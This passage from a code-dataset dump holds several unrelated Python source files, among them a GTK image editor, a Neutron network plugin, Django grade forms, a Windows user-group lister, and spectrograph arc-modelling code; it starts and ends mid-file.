self.height) // 2\n self.image.box_width = self.width\n self.image.box_height = self.height\n\n self.connect('size_allocate', size_allocate)\n self.set_size_request(self.width, self.height)\n self._drawingarea.set_size_request(self.width, self.height)\n self.show_all()\n\n def redraw(self):\n self._drawingarea.queue_draw()\n\n def draw_cb(self, widget, context):\n self.image.draw(context)\n\n def pressing(self, widget, event):\n if self.image.is_selected(event.x, event.y):\n if self.image.is_in_point(event.x, event.y):\n self.is_resize = True\n self.is_move = False\n else:\n self.is_resize = False\n self.is_move = True\n self.start_x = event.x\n self.start_y = event.y\n\n def mouse_move(self, widget, event):\n cursor = None\n if self.image.is_in_point(event.x, event.y,\n self.image.points[\"upper_left\"]) or \\\n self.image.is_in_point(event.x, event.y,\n self.image.points[\"lower_right\"]):\n cursor = Gdk.Cursor(Gdk.CursorType.BOTTOM_RIGHT_CORNER)\n elif self.image.is_in_point(event.x, event.y,\n self.image.points[\"upper_right\"]) or \\\n self.image.is_in_point(event.x, event.y,\n self.image.points[\"lower_left\"]):\n cursor = Gdk.Cursor(Gdk.CursorType.BOTTOM_LEFT_CORNER)\n elif self.image.is_selected(event.x, event.y):\n cursor = Gdk.Cursor(Gdk.CursorType.FLEUR)\n self.get_window().set_cursor(cursor)\n\n def moving(self, widget, event):\n if self.is_move:\n x_movement = event.x - self.start_x\n y_movement = event.y - self.start_y\n self.image.move(x_movement, y_movement, self.get_allocation())\n self.start_x = event.x\n self.start_y = event.y\n self.redraw()\n elif self.is_resize:\n x_movement = event.x - self.start_x\n y_movement = event.y - self.start_y\n self.image.resize(x_movement, y_movement, self.get_allocation(),\n self.start_x, self.start_y)\n self.start_x = event.x\n self.start_y = event.y\n self.redraw()\n\n def releassing(self, widget, event):\n self.is_resize = False\n self.is_move = False\n self.start_x = -1\n self.start_y = -1\n\n def reset(self):\n self.image.reset()\n self.redraw()\n\n\nclass ImageEditorView(BaseWindow):\n\n def __init__(self, comicbox):\n BaseWindow.__init__(self)\n\n self.toolbar = BasicToolbar('contract-coordinates')\n self.toolbar.stop.connect('clicked', self.__stop_clicked_cb)\n 
self.toolbar.confirm.connect('clicked', self.__ok_clicked_cb)\n\n reset_size = ToolButton(icon_name='box-size')\n reset_size.set_tooltip(_('Reset to box size'))\n self.toolbar.insert(reset_size, 3)\n reset_size.show()\n reset_size.connect('clicked', self.__reset_size_cb)\n\n self.comicbox = comicbox\n self.canvas = CanvasEditor(\n self.comicbox, self.comicbox.width,\n self.comicbox.height, self)\n\n label = Gtk.Label('')\n title = _('Drag to move or resize using the marked corners')\n label.set_markup('<span size=\"x-large\">%s</span>' % title)\n\n self.vbox = Gtk.VBox()\n self.vbox.pack_start(self.toolbar, False, False, 0)\n self.vbox.pack_start(label, False, False, style.DEFAULT_SPACING)\n self.vbox.pack_start(self.canvas, True, True, 0)\n self.add(self.vbox)\n self.modify_bg(Gtk.StateType.NORMAL,\n style.COLOR_WHITE.get_gdk_color())\n\n def __reset_size_cb(self, button):\n self.canvas.reset()\n\n def __stop_clicked_cb(self, button):\n self.destroy()\n\n def __ok_clicked_cb(self, button):\n self.comicbox.img_x = self.canvas.image.x\n self.comicbox.img_y = self.canvas.image.y\n self.comicbox.img_w = self.canvas.image.width\n self.comicbox.img_h = self.canvas.image.height\n self.comicbox.redraw()\n self.destroy()\n","sub_path":"reorderwindow.py","file_name":"reorderwindow.py","file_ext":"py","file_size_in_byte":16856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"7893126","text":"# coding: utf-8\nfrom __future__ import unicode_literals\nimport requests\n\nfrom datetime import date\nfrom .models import Holiday\n\n\n\nclass HolidayUpdater(object):\n BASE_URL = 'http://nolaborables.com.ar/API/v1/'\n\n ConnectionError = requests.ConnectionError\n\n def __init__(self, year=None):\n self.year = year or date.today().year\n\n def update(self):\n # Response is of type:\n # [{\"dia\":1,\"mes\":1,\"motivo\":\"Año Nuevo\",\"tipo\":\"inamovible\"}, ...]\n\n url = self.BASE_URL + unicode(self.year)\n data = requests.get(url, params={'excluir': 'opcional'}).json()\n\n added = 0\n for item in data:\n if 'traslado' in item:\n day = date(self.year, item['mes'], item['traslado'])\n else:\n day = date(self.year, item['mes'], item['dia'])\n\n if Holiday.objects.filter(date=day).exists():\n continue\n\n Holiday.objects.create(\n date=day, description=item.get('motivo', '')\n )\n added += 1\n return added\n","sub_path":"bookings/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"49079391","text":"\"\"\"\nContains the code that sets up the API.\n\"\"\"\n\nfrom typing import Dict\n\nimport uvicorn\nfrom fastapi import FastAPI\n\nfrom fidesapi import crud, db_session, visualize\nfrom fidesctl.core.config import get_config\n\napp = FastAPI(title=\"fidesctl\")\n\n\ndef configure_routes() -> None:\n \"Include all of the routers not defined here.\"\n for router in crud.routers:\n app.include_router(router)\n # add router for the category viz endpoints\n for router in visualize.routers:\n app.include_router(router)\n\n\ndef configure_db(database_url: str) -> None:\n \"Set up the db to be used by the app.\"\n db_session.global_init(database_url)\n\n\n@app.get(\"/health\", tags=[\"Health\"])\nasync def health() -> Dict:\n \"Confirm that the API is running and healthy.\"\n return {\"data\": {\"message\": \"Fides service is healthy!\"}}\n\n\ndef start_webserver() -> None:\n \"Run the webserver.\"\n uvicorn.run(app, host=\"0.0.0.0\", 
port=8080)\n\n\nconfig = get_config()\nconfigure_routes()\nconfigure_db(config.api.database_url)\n","sub_path":"fidesctl/src/fidesapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"331794674","text":"import pandas as pd\nimport ast\n\ndef slicePolitiek(querystring='', date=''):\n\t''' Slices and returns the TK handelingen\n\tdata as a pandas DataFrame either based on\n\twhether it contains a string or has a specific\n\tdate. '''\n\n\tdf = pd.read_csv('data/politiek/handelingen/all-handelingen.csv')\n\n\tif isinstance(querystring, list):\n\t\tquerystring = '|'.join(querystring)\n\n\tif querystring != '':\n\t\tdf = df[df['tekst'].str.contains(querystring, na=False, case=False)]\n\n\tif date != '':\n\t\tdf = df[df['datum'].str.contains(date, na=False, case=False)]\n\n\treturn df\n\ndef filterKrant(file, year, word):\n\t''' Filters a newspaper dataset on year/string'''\n\n\tdf = pd.read_csv(file)\n\tdf = df[df['full_text'].str.contains(word, na=False, case=False)]\n\n\tif isinstance(year, list):\n\t\tyear = '|'.join(str(single_year) for single_year in year)\n\telif isinstance(year, int):\n\t\tyear = str(year)\n\n\tdf = df[df['date_formatted'].str.contains(year)]\n\treturn(df)\n\ndef deduplicateKrant(file):\n\t''' Deduplicates the rows from a newspaper csv.\n\tWrites a new file (original name + -deduplicated)'''\n\n\tdf = pd.read_csv(file)\n\n\tli_dropindex = []\n\n\tfor index, row in df.iterrows():\n\t\tif index == 0:\n\t\t\tprev_row = row\n\t\telif index > 0:\n\t\t\tif str(row['author']) == str(prev_row['author']) and str(row['pagina']) == str(prev_row['pagina']) and row['date'] == prev_row['date']:\n\t\t\t\tif len(ast.literal_eval(row['tokens'])) > 4 and len(ast.literal_eval(prev_row['tokens'])) > 4:\n\t\t\t\t\tif (ast.literal_eval(row['tokens'])[2][:10] == ast.literal_eval(prev_row['tokens'])[2][:10]) and (ast.literal_eval(row['tokens'])[4][:10] == ast.literal_eval(prev_row['tokens'])[4][:10]):\n\t\t\t\t\t\tprint('equals')\n\t\t\t\t\t\tprint(str(row['title'])[:10], str(prev_row['title'])[:10])\n\t\t\t\t\t\tprint(ast.literal_eval(row['tokens'])[2][:10], ast.literal_eval(prev_row['tokens'])[2][:10])\n\t\t\t\t\t\tprint(ast.literal_eval(row['tokens'])[4][:10], ast.literal_eval(prev_row['tokens'])[4][:10])\n\t\t\t\t\t\tli_dropindex.append(index)\n\t\t\tprev_row = row\n\n\tdf = df.drop(df.index[li_dropindex])\n\tdf.to_csv(file[:-4] + '-deduplicated.csv')\n\n\nif __name__ == '__main__':\n\n\tdeduplicateKrant('data/media/kranten/all-racisme-racistisch-racist-withtokens.csv')","sub_path":"racisme-in-nederland/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"395440005","text":"import pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom dataset import get_data\n\n\ndf_yelp = get_data(['yelp', 'amazon', 'imdb'])\nsentences = df_yelp['sentence'].values\ny = df_yelp['label'].values\n\n(sentences_train,\n sentences_test,\n y_train,\n y_test) = train_test_split(sentences,\n y,\n test_size=0.25,\n random_state=1000)\n\nvectorizer = CountVectorizer()\nvectorizer.fit(sentences_train)\nX_train = vectorizer.transform(sentences_train)\nX_test = vectorizer.transform(sentences_test)\n\nclassifier = 
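The /health route in the fidesapi record returns a fixed payload, so FastAPI's bundled TestClient can exercise it without starting a server. A sketch; note that the module calls configure_db() at import time, so this assumes a reachable database_url in the fidesctl config:

from fastapi.testclient import TestClient
from fidesapi.main import app   # import path assumed from the record's sub_path

client = TestClient(app)
response = client.get("/health")
assert response.status_code == 200
assert response.json() == {"data": {"message": "Fides service is healthy!"}}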
LogisticRegression()\nclassifier.fit(X_train, y_train)\nscore = classifier.score(X_test, y_test)\n\nprint(\"Accuracy\", score)\n","sub_path":"cnn/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31112252","text":"#!/usr/bin/python\n\n# [(groupName, attribute), ...] = NetUserGetGroups(serverName, userName )\n# Returns a list of groups,attributes for all groups for the user.\n\n# >>> win32net.NetUserGetGroups(None,\"rchateau\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetGroups(\"TITI\",\"vero\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetGroups(\"TITI\",\"guest\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetGroups(\"TITI\",\"guest\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetLocalGroups(\"TITI\",\"guest\")\n# [u'Guests']\n# >>> win32net.NetUserGetLocalGroups(\"TITI\",\"vero\")\n# [u'HomeUsers', u'Users']\n# >>> win32net.NetUserGetLocalGroups(None,\"rchateau\")\n# [u'HomeUsers', u'ORA_DBA', u'TelnetClients', u'Administrators', u'Performance Log Users']\n# >>> win32net.NetUserGetGroups(\"Titi\",\"rchat_000\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetLocalGroups(\"Titi\",\"rchat_000\")\n# [u'HomeUsers', u'Administrators', u'Performance Log Users']\n\n\n\n\n\"\"\"\nGroups of a Windows user\n\"\"\"\n\nimport sys\nimport lib_util\nimport lib_common\nfrom lib_properties import pc\nimport lib_win32\n\nimport win32net\n\nfrom sources_types import Win32_Group as survol_Win32_Group\nfrom sources_types import Win32_UserAccount as survol_Win32_UserAccount\n\nUsable = lib_util.UsableWindows\n\nCanProcessRemote = True\n\ndef Main():\n\tcgiEnv = lib_common.CgiEnv(can_process_remote = True)\n\n\ttry:\n\t\t# Exception if local machine.\n\t\thostName = cgiEnv.m_entity_id_dict[\"Domain\"]\n\texcept KeyError:\n\t\thostName = None\n\n\tif not hostName or lib_util.IsLocalAddress( hostName ):\n\t\tserverBox = lib_common.gUriGen\n\t\tserverNode = lib_common.nodeMachine\n\t\tservName_or_None = None\n\telse:\n\t\tserverBox = lib_common.RemoteBox(hostName)\n\t\tserverNode = lib_common.gUriGen.HostnameUri(hostName)\n\t\tservName_or_None = hostName\n\n\t\t# hostname = \"Titi\" for example\n\t\ttry:\n\t\t\tlib_win32.WNetAddConnect(hostName)\n\t\texcept:\n\t\t\tlib_common.ErrorMessageHtml(\"Error WNetAddConnect %s:%s\"%(hostName,str(sys.exc_info())))\n\n\n\tuserName = cgiEnv.m_entity_id_dict[\"Name\"]\n\n\tsys.stderr.write(\"hostName=%s userName=%s\\n\" %(hostName,userName))\n\n\tgrph = cgiEnv.GetGraph()\n\n\tnodeUser = survol_Win32_UserAccount.MakeUri( userName, hostName )\n\n\t# TODO: Quid de NetUserGetGroups ??\n\n\t# [(groupName, attribute), ...] 
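The bag-of-words record above fits CountVectorizer and LogisticRegression as two separate steps, so scoring new text must reuse the already-fitted vectorizer (transform, never fit_transform, or the vocabulary changes under the model). Continuing from the variables fitted above:

new_sentences = ["the food was great", "terrible, would not recommend"]
X_new = vectorizer.transform(new_sentences)   # reuse the training vocabulary
print(classifier.predict(X_new))              # e.g. [1 0] for positive/negative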
= NetUserGetGroups(serverName, userName )\n\ttry:\n\t\tresuList = win32net.NetUserGetLocalGroups(servName_or_None,userName)\n\texcept:\n\t\tlib_common.ErrorMessageHtml(\"Error:\"+str(sys.exc_info()))\n\n\tfor groupName in resuList:\n\t\tnodeGroup = survol_Win32_Group.MakeUri( groupName, hostName )\n\t\tgrph.add( ( nodeUser, pc.property_group, nodeGroup ) )\n\n\t\tif hostName:\n\t\t\tnodeGroupRemote = serverBox.UriMakeFromDict(\"Win32_Group\", { \"Name\" : groupName, \"Domain\" : hostName } )\n\t\t\t# TODO: Instead, both object must have the same universal alias\n\t\t\tgrph.add( (nodeGroup, pc.property_alias, nodeGroupRemote ) )\n\n\n\n\tcgiEnv.OutCgiRdf()\n\nif __name__ == '__main__':\n\tMain()\n\n\n","sub_path":"survol/sources_types/Win32_UserAccount/Win32_NetUserGetGroups.py","file_name":"Win32_NetUserGetGroups.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"210411422","text":"import pygame\n\nclass Image:\n def __init__(self, images):\n # pygame.sprite.Sprite.__init__(self)\n\n self.images = []\n\n if not isinstance(images, list): # wrap a single surface; the old test (images!=list()) also matched non-empty lists and stored the whole list as one frame\n self.images.append(images)\n else:\n for image in images:\n self.images.append(image)\n\n self.image = self.images[0]\n\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n\n self.mwidth = self.width//2\n self.mheight = self.height//2\n\n self.index = 0\n self.length = len(self.images)\n\n def rotate(self, original_image, angle):\n img = pygame.transform.rotate(original_image, int(angle))\n return img\n\n def update(self):\n self.index = (self.index + 1) % self.length # wrap around instead of stepping past the last frame\n self.image = self.images[self.index]\n\n def draw(self, angle, win, x, y):\n img = self.rotate(self.image, angle)\n a = (img.get_width() - self.width) // 2\n b = (img.get_height() - self.height) // 2\n\n win.blit(img, (x - self.mwidth - a, y - self.mheight - b))\n # win.blit(img, (MWIDTH - 16 - a, MHEIGHT - 16 - b))\n\n# a = Image( pygame.image.frombuffer(Images.Images.arrow, (7, 16), 'RGBA'))","sub_path":"client/classes/Image.py","file_name":"Image.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"195640730","text":"# Copyright 2015-2016 NEC Corporation. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron.api.rpc.handlers import dhcp_rpc\nfrom neutron.api.rpc.handlers import metadata_rpc\nfrom neutron.api.rpc.handlers import securitygroups_rpc\nfrom neutron.common import rpc as n_rpc\nfrom neutron.common import topics\nfrom neutron.db import agents_db\nfrom neutron.extensions import multiprovidernet as mpnet\nfrom neutron.extensions import providernet as provider\nfrom neutron.plugins.ml2 import db as db_ml2\nfrom neutron.plugins.ml2 import driver_api as api\nfrom neutron.plugins.ml2 import plugin as ml2_plugin\nfrom oslo_log import log as logging\n\nfrom networking_nec.i18n import _LE, _LI, _LW\nfrom networking_nec.nwa.common import constants as nwa_const\nfrom networking_nec.nwa.l2 import db_api as necnwa_api\nfrom networking_nec.nwa.l2.rpc import ml2_server_callback\nfrom networking_nec.nwa.l2.rpc import nwa_agent_api\nfrom networking_nec.nwa.l2.rpc import nwa_l2_server_callback\nfrom networking_nec.nwa.l2.rpc import nwa_proxy_api\nfrom networking_nec.nwa.l2.rpc import tenant_binding_callback\n\nLOG = logging.getLogger(__name__)\n\n\nclass NECNWAL2Plugin(ml2_plugin.Ml2Plugin):\n\n def __init__(self):\n super(NECNWAL2Plugin, self).__init__()\n self._nwa_agent_rpc_setup()\n\n def _nwa_agent_rpc_setup(self):\n self.nwa_rpc = nwa_agent_api.NECNWAAgentApi(\n nwa_const.NWA_AGENT_TOPIC\n )\n self.nwa_proxies = {}\n\n def start_rpc_listeners(self):\n self.endpoints = [\n ml2_server_callback.NwaML2ServerRpcCallbacks(\n self.notifier, self.type_manager),\n nwa_l2_server_callback.NwaL2ServerRpcCallback(),\n tenant_binding_callback.TenantBindingServerRpcCallback(),\n securitygroups_rpc.SecurityGroupServerRpcCallback(),\n dhcp_rpc.DhcpRpcCallback(),\n agents_db.AgentExtRpcCallback(),\n metadata_rpc.MetadataRpcCallback()]\n\n self.topic = topics.PLUGIN\n self.conn = n_rpc.create_connection()\n self.conn.create_consumer(self.topic, self.endpoints,\n fanout=False)\n return self.conn.consume_in_threads()\n\n def _extend_network_dict_provider(self, context, network):\n if 'id' not in network:\n LOG.debug(\"Network has no id\")\n network[provider.NETWORK_TYPE] = None\n network[provider.PHYSICAL_NETWORK] = None\n network[provider.SEGMENTATION_ID] = None\n return\n\n net_id = network['id']\n segments = db_ml2.get_network_segments(\n context.session, net_id, filter_dynamic=True)\n\n if not segments:\n LOG.debug(\"Network %s has no segments\", net_id)\n network[provider.NETWORK_TYPE] = None\n network[provider.PHYSICAL_NETWORK] = None\n network[provider.SEGMENTATION_ID] = None\n elif len(segments) > 1:\n network[mpnet.SEGMENTS] = [\n {provider.NETWORK_TYPE: segment[api.NETWORK_TYPE],\n provider.PHYSICAL_NETWORK: segment[api.PHYSICAL_NETWORK],\n provider.SEGMENTATION_ID: segment[api.SEGMENTATION_ID]}\n for segment in segments]\n else:\n segment = segments[0]\n network[provider.NETWORK_TYPE] = segment[api.NETWORK_TYPE]\n network[provider.PHYSICAL_NETWORK] = segment[api.PHYSICAL_NETWORK]\n network[provider.SEGMENTATION_ID] = segment[api.SEGMENTATION_ID]\n\n # pylint: disable=redefined-builtin\n def get_network(self, context, id, fields=None):\n session = context.session\n\n with session.begin(subtransactions=True):\n network = self._get_network(context, id)\n result = self._make_network_dict(network, fields)\n self._extend_network_dict_provider(context, result)\n\n return self._fields(result, fields)\n\n def get_networks(self, context, filters=None, fields=None,\n sorts=None, limit=None, 
marker=None, page_reverse=False):\n return super(\n NECNWAL2Plugin,\n self\n ).get_networks(context, filters, None, sorts,\n limit, marker, page_reverse)\n\n def _create_nwa_agent_tenant_queue(self, context, tenant_id):\n if (\n self._is_alive_nwa_agent(context) and\n necnwa_api.get_nwa_tenant_queue(\n context.session,\n tenant_id\n ) is None\n ):\n self.nwa_rpc.create_server(context, tenant_id)\n necnwa_api.add_nwa_tenant_queue(context.session, tenant_id)\n else:\n LOG.warning(_LW('%s is not alive.'),\n nwa_const.NWA_AGENT_TYPE)\n\n def create_network(self, context, network):\n result = super(NECNWAL2Plugin,\n self).create_network(context, network)\n self._create_nwa_agent_tenant_queue(context, context.tenant_id)\n return result\n\n def delete_network(self, context, id):\n result = super(NECNWAL2Plugin,\n self).delete_network(context, id)\n return result\n\n def create_port(self, context, port):\n result = super(NECNWAL2Plugin,\n self).create_port(context, port)\n\n return result\n\n def get_nwa_topics(self, context, tid):\n rss = self.nwa_rpc.get_nwa_rpc_servers(context)\n if isinstance(rss, dict) and rss.get('nwa_rpc_servers'):\n return [t.get('topic') for t in rss['nwa_rpc_servers']\n if t.get('tenant_id') == tid]\n else:\n return []\n\n def get_nwa_proxy(self, tid, context=None):\n if tid not in self.nwa_proxies:\n self.nwa_proxies[tid] = nwa_proxy_api.NECNWAProxyApi(\n nwa_const.NWA_AGENT_TOPIC, tid\n )\n if context:\n self._create_nwa_agent_tenant_queue(context, tid)\n nwa_topics = self.get_nwa_topics(context, tid)\n if len(nwa_topics) == 1:\n LOG.info(_LI('NWA tenant queue: new topic is %s'),\n str(nwa_topics[0]))\n else:\n LOG.warning(_LW('NWA tenant queue is not created. tid=%s'),\n tid)\n LOG.debug('proxy tid=%s', tid)\n return self.nwa_proxies[tid]\n\n def _is_alive_nwa_agent(self, context):\n agents = self.get_agents(\n context,\n filters={'agent_type': [nwa_const.NWA_AGENT_TYPE]}\n )\n return any(agent['alive'] for agent in agents)\n\n # This needs to be defined to avoid pylint abstract-method check.\n def get_port_from_device(self, context, device):\n LOG.error(_LE('This method should not be called. 
'\n 'get_ports_from_devices is used.'))\n","sub_path":"networking_nec/nwa/l2/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":7384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"401499699","text":"from django import forms\nfrom .models import Discipline,Note\nfrom registration.models import Classe,Eleve\nfrom staff.models import Enseignant\nclass remplir_noteForm(forms.ModelForm):\n class Meta:\n model=Note\n\n\n fields=[\n\n 'eleve',\n 'discipline',\n 'evaluation1',\n 'evaluation2',\n ]\n\nclass ajouter_disciplineForm(forms.ModelForm):\n class Meta:\n model=Discipline\n\n\n fields=[\n\n 'intitule',\n 'coef',\n 'enseignant',\n 'classe',\n ]\nclass BulletinForm(forms.Form):\n matiere=forms.ModelMultipleChoiceField(queryset=Discipline.objects.all(),widget=forms.CheckboxSelectMultiple)\n classe= forms.ModelMultipleChoiceField(queryset=Classe.objects.all(), widget=forms.CheckboxSelectMultiple)\n enseignant = forms.ModelMultipleChoiceField(queryset=Enseignant.objects.all(), widget=forms.CheckboxSelectMultiple)\n eleve = forms.ModelMultipleChoiceField(queryset=Eleve.objects.all(), widget=forms.CheckboxSelectMultiple)\n coef=forms.IntegerField(label='coefficient',initial='Coef',widget=forms.TextInput(attrs={\n 'class':'form-control',\n 'placeholder':'Coef'\n }))\n note_I=forms.FloatField(label='note evaluation I',initial='note 1')\n note_II = forms.FloatField(label='note evaluation II', initial='note 2')\n","sub_path":"report_card/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"178977396","text":"\ndef 写入日志(msg):\n import logging\n kwargs = {\n \"filename\": \"logs.txt\",\n \"format\": \"%(asctime)s - %(message)s\"\n }\n logger = logging.getLogger()\n fh = logging.FileHandler(\"test.log\",encoding=\"utf-8\",mode=\"a\")\n formatter = logging.Formatter(\"%(asctime)s - %(message)s\")\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n logger.setLevel(logging.DEBUG)\n logger.warning(msg)\n\nif __name__ == '__main__':\n 写入日志(\"hello李华盛\")","sub_path":"test/测试日志写入.py","file_name":"测试日志写入.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603185720","text":"import numpy as n\nimport pyfits as pf\nfrom bbspec.spec2d import boltonfuncs as GH\nfrom scipy import special,interpolate,linalg\n\nclass arcmodel2D:\n\n x = n.arange(-5,6,1) \n y = n.arange(-5,6,1)\n fibNo = 500\n fibBun = 20\n xpoints = 4114\n degree = 3\n nbund = 25\n modules = ('numpy as n','pyfits as pf','scipy.special','scipy.interpolate as interpolate','scipy.linalg')\n\n def __init__(self,indir = '.', outdir = '.'):\n self.indir = indir\n self.outdir = outdir\n self.color = None\n self.reqwave = None\n \n def model_arc_flat_bundle(self,arcid,flatid,i_bund):\n self.setarc_flat(arcid,flatid)\n return self.model_arc(i_bund)\n \n def setarc_flat(self,arcid,flatid):\n self.arcid = arcid\n self.flatid = flatid\n self.setcolor()\n \n spArc_file = self.indir + '/spArc-' + self.arcid + '.fits' \n spFlat_file = self.indir + '/spFlat-' + self.flatid + '.fits' \n data_file = self.indir + '/sdProc-' + self.arcid + '.fits' \n\n # Data & invvar from sdR files\n data = pf.open(data_file)\n self.biasSubImg = data[0].data\n self.invvr = data[1].data\n data.close()\n \n # spArc files\n h_spArc = pf.open(spArc_file)\n self.spArc_image = h_spArc[0].data\n 
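# HDU 1 holds one row per good arc line: column 0 is the line wavelength, the remaining columns are its fitted y-position on each fiber (unpacked in dataspArc below)\n 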
self.good_lambda_val = h_spArc[1].data\n self.waveset = self.get_data(h_spArc,2)\n self.ysigma = self.get_data(h_spArc,4)\n h_spArc.close()\n \n #spFlat files\n h_spFlat = pf.open(spFlat_file)\n self.spFlat_image = h_spFlat[0].data\n self.peakPos = self.get_data(h_spFlat,1)\n self.xsigma= self.get_data(h_spFlat,3)\n h_spFlat.close() \n \n\n def get_data(self,hdu,i): return n.rec.array(hdu[i].data,dtype=hdu[i].data.dtype)\n \n def setcolor(self):\n pos = self.arcid.rfind('/')\n if pos<0: self.color = self.arcid[0]\n elif pos<len(self.arcid)-1: self.color = self.arcid[pos+1]\n else: self.color = None\n if self.color!='r' and self.color!='b': print(\"ERROR: File name not in correct format\")\n \n if (self.color == 'r'): \n self.ypoints = 4128\n self.yvalues = n.arange(0,self.ypoints,1)\n self.nwavelen = 65\n # wavelength indexes which do not have outliers \n self.reqwave = n.array([6,9,10,11,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,37,41,42,44,46,47,48,49,50,52,53,55,56,57,59,60,62,64]) #00126630\n \n elif (self.color == 'b'): \n self.ypoints = 4112\n self.yvalues = n.arange(0,self.ypoints,1)\n self.nwavelen = 45 \n # wavelength indexes which do not have outliers \n #self.reqwave = n.array([0,1,4,5,10,14,15,16,25,26,28,29,30,32,33,34,35,36,37,38,39,40,41,42,44,45]) #00115982\n self.reqwave = n.array([4,5,9,12,13,15,19,24,25,26,27,28,29,31,32,33,34,35,36,37,38,39,40,41,43,44]) #00126630\n \n def model_arc(self, i_bund):\n i_bund = int(i_bund)\n #- make floating point errors fatal (fail early, fail often)\n n.seterr(all='raise')\n\n # Data from spArc files\n [goodwaveypos, good_wavelength, wavelength, arcSigma] = self.dataspArc()\n\n # Data from spFlat files\n [fiberflat, xpos_final, flatSigma] = self.dataspFlat()\n\n # allocating space for variables\n self.yvalues = n.arange(0,self.ypoints,1)\n GHparam = n.zeros((self.nwavelen,arcmodel2D.nbund,15,15))\n fib = n.arange(0,arcmodel2D.fibNo,1) \n ngoodwave=len(good_wavelength)\n chi_sqrd = n.zeros((self.nwavelen,arcmodel2D.nbund,1))\n\n coeffAll = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree + 1,15,15))\n xcenter = n.zeros((self.nwavelen,arcmodel2D.nbund,arcmodel2D.fibBun))\n ycenter = n.zeros((self.nwavelen,arcmodel2D.nbund,arcmodel2D.fibBun))\n sigma = n.zeros((self.nwavelen,arcmodel2D.nbund,arcmodel2D.fibBun))\n\n # define max order\n maxorder = 4\n\n kcons = i_bund*arcmodel2D.fibBun\n for i_actwave in range(0, self.nwavelen):\n # declare variables\n #print good_wavelength.size,i_actwave\n actwavelength = good_wavelength[i_actwave]\n func = interpolate.interp1d(good_wavelength,goodwaveypos[:,fib[kcons]], kind='cubic')\n yact = func(actwavelength)\n y1 = round(yact) -10 \n y2 = round(yact) +10 \n x1 = round(xpos_final[round(yact),fib[kcons]])\n x2 = round(xpos_final[round(yact),fib[kcons+19]])\n x1im = (x1)-10\n x2im = (x2)+10\n y1im = (y1)-10\n y2im = (y2)+10\n fibcons = n.arange(kcons,kcons+arcmodel2D.fibBun,1)\n rowimage = self.biasSubImg[y1im:y2im+1,x1im:x2im+1]\n x_pix = n.arange(x1im,x2im+1,1) \n y_pix = n.arange(y1im,y2im+1,1)\n numx = len(x_pix) \n numy = len(y_pix)\n numk = len(fibcons) \n numlambda_val = 1\n flag = 0 \n n_k = n.zeros((len(fibcons),1))\n basisfuncstack = n.zeros((numlambda_val,numk,numy,numx))\n basisstack = n.zeros((numy*numx,1))\n mm = 0 ; nn = 0\n \n # Creating basis function\n for mor in range (0,maxorder+1):\n for nor in range (0, maxorder+1):\n if (mor+nor <= 4):\n mm = n.hstack((mm,mor))\n nn = n.hstack((nn,nor))\n [ff, basisfunc, basisimage,flag,xcenarr,ycenarr, sigmaarr] = 
